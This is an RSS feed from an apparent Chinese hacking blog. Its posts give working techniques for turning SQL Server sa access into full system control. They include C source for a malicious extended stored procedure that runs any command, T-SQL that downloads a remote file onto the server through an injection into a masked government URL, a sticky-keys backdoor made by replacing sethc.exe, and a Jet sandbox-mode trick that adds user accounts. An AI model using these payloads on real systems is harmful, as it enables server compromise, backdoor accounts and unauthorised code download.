<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; SA</title>
	<atom:link href="http://www.4shell.org/archives/tag/sa/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Tue, 31 Jan 2012 12:43:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>xp_hello.dll(sa) 提权</title>
		<link>http://www.4shell.org/archives/1841.html</link>
		<comments>http://www.4shell.org/archives/1841.html#comments</comments>
		<pubDate>Thu, 26 Aug 2010 13:30:56 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[SA]]></category>
		<category><![CDATA[提权]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1841</guid>
		<description><![CDATA[来源：冰点论坛 2月 主要代码： 在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码： #include &#60;stdafx.h&#62; #include &#60;shellapi.h&#62; #define XP_NOERROR 0 #define XP_ERROR 1 #define MAXCOLNAME 25 #define MAXNAME 25 #define MAXTEXT 255 #ifdef __cplusplus extern “C” { #endif RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc); #ifdef __cplusplus } #endif RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc) { /***************************** 说明 ************************* 由于本人人品不好还是怎么的，库里没有srv_paraminfo函数，卧槽， 无赖之下，只好用老式的srv_paramdata *************************************************************/ int bufLen; DBCHAR spName[MAXNAME]; DBCHAR spText[MAXTEXT]; DBCHAR [...]]]></description>
			<content:encoded><![CDATA[<p>来源：冰点论坛 2月</p>
<p>主要代码：</p>
<p>在VC6里面新建一个储存过程项目，在proc.cpp中写入如下代码：</p>
<blockquote><p>
#include &lt;stdafx.h&gt;</p>
<p>#include &lt;shellapi.h&gt;</p>
<p>#define XP_NOERROR              0</p>
<p>#define XP_ERROR                1</p>
<p>#define MAXCOLNAME     25</p>
<p>#define MAXNAME      25</p>
<p>#define MAXTEXT      255</p>
<p>#ifdef __cplusplus</p>
<p>extern “C” {</p>
<p>#endif</p>
<p>RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc);</p>
<p>#ifdef __cplusplus</p>
<p>}</p>
<p>#endif</p>
<p>RETCODE __declspec(dllexport) xp_hello(SRV_PROC *srvproc)</p>
<p>{</p>
<p>/***************************** 说明 *************************</p>
<p>由于本人人品不好还是怎么的，库里没有srv_paraminfo函数，卧槽，</p>
<p>无赖之下，只好用老式的srv_paramdata</p>
<p>*************************************************************/</p>
<p>int bufLen;</p>
<p>DBCHAR spName[MAXNAME];</p>
<p>DBCHAR spText[MAXTEXT];</p>
<p>DBCHAR spBuf[MAXTEXT];</p>
<p>unsigned char cmdline[255] = “”;</p>
<p>if(srv_rpcparams(srvproc) != 1) return XP_ERROR; //参数判断，如果参数不是1个就立即退出</p>
<p>bufLen = srv_paramlen(srvproc,1);</p>
<p>if(!bufLen) return XP_ERROR;</p>
<p>wsprintf(spBuf,(DBCHAR*)srv_paramdata(srvproc,1));spBuf[bufLen] = ‘\0′; //获取第一个参数的值</p>
<p>wsprintf(spName, “xp_hello”);</p>
<p>wsprintf(spText, “%s Run command:[%s]\r\n\t\t\tMSN:ylbhz@hotmail.com”, spName,spBuf);</p>
<p>srv_sendmsg(srvproc,SRV_MSG_INFO,0,(DBTINYINT)0,(DBTINYINT)0,NULL,0,0,spText,SRV_NULLTERM); //发送消息</p>
<p>wsprintf((char*)cmdline,”/c %s”,spBuf); //构造参数</p>
<p>ShellExecute(0,”open”,”cmd.exe”,(char*)cmdline,NULL,SW_SHOW); //执行命令</p>
<p>return XP_NOERROR ;</p>
<p>}
</p></blockquote>
<p><span id="more-1841"></span><br />
编译生成xp_hello.dll</p>
<p>以SA连接SQL Server 执行</p>
<p>dbcc addextendedproc(‘xp_hello’,'c:\xp_hello.dll’);</p>
<p>提示成功过后，调用</p>
<p>exec xp_hello ‘net user fuck fuck /add’;</p>
<p>这样系统里面就多了个fuck账户</p>
<p>C:\Documents and Settings\Administrator\桌面\工作区间\C\Debug>net user</p>
<p>\\PC-200910151119 的用户帐户</p>
<p>—————————————————————————–<br />
Administrator            ASPNET                   fuck<br />
Guest                    HelpAssistant            IUSR_PC-200910151119<br />
IWAM_PC-200910151119     SQLDebugger              SUPPORT_388945a0<br />
VUSR_PC-200910151119<br />
命令成功完成。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2007年12月10日 -- <a href="http://www.4shell.org/archives/257.html" title="sa 无xp_cmdshell下提限又一简单方法">sa 无xp_cmdshell下提限又一简单方法</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1723.html" title="rar.exe在提权中的妙用">rar.exe在提权中的妙用</a></li><li>2010年04月20日 -- <a href="http://www.4shell.org/archives/1718.html" title="沙盒提权的小tips">沙盒提权的小tips</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2009年12月22日 -- <a href="http://www.4shell.org/archives/1345.html" title="关于搜狗拼音输入法提权的应用">关于搜狗拼音输入法提权的应用</a></li><li>2009年08月5日 -- <a href="http://www.4shell.org/archives/998.html" title="Serv-U FTP Server v8 本地提权">Serv-U FTP Server v8 本地提权</a></li><li>2009年07月24日 -- <a href="http://www.4shell.org/archives/939.html" title="xml.http 下载拿SHELL">xml.http 下载拿SHELL</a></li><li>2009年07月23日 -- <a href="http://www.4shell.org/archives/937.html" title="针对Dbowner权限下的提权脚本(转)">针对Dbowner权限下的提权脚本(转)</a></li><li>2009年06月25日 -- <a href="http://www.4shell.org/archives/809.html" title="sa权限下无xp_cmdshell下取权限又一简单方法">sa权限下无xp_cmdshell下取权限又一简单方法</a></li><li>2009年05月14日 -- <a href="http://www.4shell.org/archives/775.html" title="关于html本地权限问题">关于html本地权限问题</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1841.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>xml.http 下载拿SHELL</title>
		<link>http://www.4shell.org/archives/939.html</link>
		<comments>http://www.4shell.org/archives/939.html#comments</comments>
		<pubDate>Fri, 24 Jul 2009 03:22:03 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[SA]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/939.html</guid>
		<description><![CDATA[注意以下语句在SA权限下执行，对于N多扩展存储过程被删除时使用效果最佳: DECLARE @B varbinary(8000), @hr int, @http INT, @down INT EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;-- 将以上代码修改后转化为十六进制。然后提交： http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8 ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS [...]]]></description>
			<content:encoded><![CDATA[<p>注意以下语句在SA权限下执行，对于N多扩展存储过程被删除时使用效果最佳:</p>
<blockquote><p>DECLARE<br />
@B varbinary(8000),<br />
@hr int,<br />
@http INT,<br />
@down INT<br />
EXEC sp_oacreate [Microsoft.XMLHTTP],@http output ;EXEC @hr = sp_oamethod @http,[Open],null,[GET],[要下载的文件地址],0 ;EXEC @hr = sp_oamethod @http,[Send],null ;EXEC @hr=sp_OAGetProperty @http,[responseBody],@B output ;EXEC @hr=sp_oacreate [ADODB.Stream],@down output ;EXEC @hr=sp_OASetProperty @down,[Type],1 ;EXEC @hr=sp_OASetProperty @down,[mode],3 ;EXEC @hr=sp_oamethod @down,[Open],null ;EXEC @hr=sp_oamethod @down,[Write],null,@B ;EXEC @hr=sp_oamethod @down,[SaveToFile],null,[保存在服务器上的绝对路径],1 ;--<br />
将以上代码修改后转化为十六进制。然后提交：<br />
<a rel="external" href="http://www.xxxx.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8" target="_blank">http://www.XXXX.gov.cn/XXX/hdsq/XXXXfo.jsp?ID=8</a> ;DECLARE @S VARCHAR(4000);SET @S=CAST(十六进制代码 AS VARCHAR(4000));EXEC(@S);--</p></blockquote>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2009年06月25日 -- <a href="http://www.4shell.org/archives/809.html" title="sa权限下无xp_cmdshell下取权限又一简单方法">sa权限下无xp_cmdshell下取权限又一简单方法</a></li><li>2007年12月10日 -- <a href="http://www.4shell.org/archives/257.html" title="sa 无xp_cmdshell下提限又一简单方法">sa 无xp_cmdshell下提限又一简单方法</a></li><li>2007年11月18日 -- <a href="http://www.4shell.org/archives/242.html" title="SA下不用恢复xp_cmdshell和xplog70.dll也执行命令">SA下不用恢复xp_cmdshell和xplog70.dll也执行命令</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/939.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>sa权限下无xp_cmdshell下取权限又一简单方法</title>
		<link>http://www.4shell.org/archives/809.html</link>
		<comments>http://www.4shell.org/archives/809.html#comments</comments>
		<pubDate>Thu, 25 Jun 2009 09:21:55 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[SA]]></category>

		<guid isPermaLink="false">http://202.172.32.240/~shellorg/archives/809.html</guid>
		<description><![CDATA[有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法<br/>（很多服务器都把'wscript.shell'给删了。）<br/>看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject<br/>网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。<br/>...
]]></description>
			<content:encoded><![CDATA[<p>有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法<br/>（很多服务器都把'wscript.shell'给删了。）<br/>看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject<br/>网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。<br/>上网找了些资料，得到下面方法：<br/>复制文件：<br/><br/>declare @o int<br/>exec sp_oacreate 'scripting.filesystemobject', @o out <br/>exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';<br/><br/>declare @oo int<br/>exec sp_oacreate 'scripting.filesystemobject', @oo out <br/>exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';<br/><br/>成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。<br/>此法随无技术可言，希望对某些人有点用。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2009年07月24日 -- <a href="http://www.4shell.org/archives/939.html" title="xml.http 下载拿SHELL">xml.http 下载拿SHELL</a></li><li>2007年12月10日 -- <a href="http://www.4shell.org/archives/257.html" title="sa 无xp_cmdshell下提限又一简单方法">sa 无xp_cmdshell下提限又一简单方法</a></li><li>2007年11月18日 -- <a href="http://www.4shell.org/archives/242.html" title="SA下不用恢复xp_cmdshell和xplog70.dll也执行命令">SA下不用恢复xp_cmdshell和xplog70.dll也执行命令</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/809.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>sa 无xp_cmdshell下提限又一简单方法</title>
		<link>http://www.4shell.org/archives/257.html</link>
		<comments>http://www.4shell.org/archives/257.html#comments</comments>
		<pubDate>Sun, 09 Dec 2007 16:58:10 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[SA]]></category>
		<category><![CDATA[提权]]></category>

		<guid isPermaLink="false">http://202.172.32.240/~shellorg/archives/257.html</guid>
		<description><![CDATA[有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法<br />（很多服务器都把'wscript.shell'给删了。）<br />看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject<br />网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。<br />上网找了些资料，得到下面方法：
]]></description>
			<content:encoded><![CDATA[<p>有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法<br />（很多服务器都把'wscript.shell'给删了。）<br />看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject<br />网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。<br />上网找了些资料，得到下面方法：<br />复制文件：
<p class="code"><code>declare&nbsp;@o&nbsp;int<br />exec&nbsp;sp_oacreate&nbsp;'scripting.filesystemobject',&nbsp;@o&nbsp;out&nbsp;<br />exec&nbsp;sp_oamethod&nbsp;@o,&nbsp;'copyfile',null,'c:\windows\explorer.exe'&nbsp;,'c:\windows\system32\sethc.exe';</p>
<p>declare&nbsp;@oo&nbsp;int<br />exec&nbsp;sp_oacreate&nbsp;'scripting.filesystemobject',&nbsp;@oo&nbsp;out&nbsp;<br />exec&nbsp;sp_oamethod&nbsp;@oo,&nbsp;'copyfile',null,'c:\windows\system32\sethc.exe'&nbsp;,'c:\windows\system32\dllcache\sethc.exe';<br /></code></p>
<p>成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。<br />此法随无技术可言，希望对某些人有点用。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2010年04月23日 -- <a href="http://www.4shell.org/archives/1723.html" title="rar.exe在提权中的妙用">rar.exe在提权中的妙用</a></li><li>2010年04月20日 -- <a href="http://www.4shell.org/archives/1718.html" title="沙盒提权的小tips">沙盒提权的小tips</a></li><li>2010年01月31日 -- <a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li><li>2009年12月22日 -- <a href="http://www.4shell.org/archives/1345.html" title="关于搜狗拼音输入法提权的应用">关于搜狗拼音输入法提权的应用</a></li><li>2009年08月5日 -- <a href="http://www.4shell.org/archives/998.html" title="Serv-U FTP Server v8 本地提权">Serv-U FTP Server v8 本地提权</a></li><li>2009年07月24日 -- <a href="http://www.4shell.org/archives/939.html" title="xml.http 下载拿SHELL">xml.http 下载拿SHELL</a></li><li>2009年07月23日 -- <a href="http://www.4shell.org/archives/937.html" title="针对Dbowner权限下的提权脚本(转)">针对Dbowner权限下的提权脚本(转)</a></li><li>2009年06月25日 -- <a href="http://www.4shell.org/archives/809.html" title="sa权限下无xp_cmdshell下取权限又一简单方法">sa权限下无xp_cmdshell下取权限又一简单方法</a></li><li>2009年05月14日 -- <a href="http://www.4shell.org/archives/775.html" title="关于html本地权限问题">关于html本地权限问题</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/257.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>SA下不用恢复xp_cmdshell和xplog70.dll也执行命令</title>
		<link>http://www.4shell.org/archives/242.html</link>
		<comments>http://www.4shell.org/archives/242.html#comments</comments>
		<pubDate>Sun, 18 Nov 2007 15:42:38 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[SA]]></category>
		<category><![CDATA[小技巧]]></category>

		<guid isPermaLink="false">http://202.172.32.240/~shellorg/archives/242.html</guid>
		<description><![CDATA[也被一些人不断的再次提出来，<br />为了方便自己记忆再写出来，<br />在这种情况下，要执行命令，条件是要有xp_regwrite。<br /><br />首先开启沙盘模式：
]]></description>
			<content:encoded><![CDATA[<p>sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，<br />也被一些人不断的再次提出来，<br />为了方便自己记忆再写出来，<br />在这种情况下，要执行命令，条件是要有xp_regwrite。</p>
<p>首先开启沙盘模式：
<p class="code"><code>exec&nbsp;master..xp_regwrite&nbsp;'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1<br /></code></p>
<p>然后利用jet.oledb执行系统命令
<p class="code"><code>select&nbsp;*&nbsp;from&nbsp;openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select&nbsp;shell("cmd.exe&nbsp;/c&nbsp;net&nbsp;user&nbsp;cnfjhh&nbsp;fst&nbsp;/add")')<br /></code></p>
<p></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2012年01月31日 -- <a href="http://www.4shell.org/archives/2078.html" title="命令行导出IIS配置信息">命令行导出IIS配置信息</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2051.html" title="域内指定用户中马">域内指定用户中马</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2010年08月26日 -- <a href="http://www.4shell.org/archives/1841.html" title="xp_hello.dll(sa) 提权">xp_hello.dll(sa) 提权</a></li><li>2010年05月5日 -- <a href="http://www.4shell.org/archives/1750.html" title="搞内网的一个小技巧">搞内网的一个小技巧</a></li><li>2010年04月22日 -- <a href="http://www.4shell.org/archives/1720.html" title="更改windows2003最大连接数">更改windows2003最大连接数</a></li><li>2010年03月1日 -- <a href="http://www.4shell.org/archives/1591.html" title="让千千静听不再弹出广告">让千千静听不再弹出广告</a></li><li>2010年01月19日 -- <a href="http://www.4shell.org/archives/1476.html" title="手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】">手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】</a></li><li>2009年11月5日 -- <a href="http://www.4shell.org/archives/1156.html" title="MySQL导入数据库文件最大限制2048KB的修改解决办法">MySQL导入数据库文件最大限制2048KB的修改解决办法</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/242.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

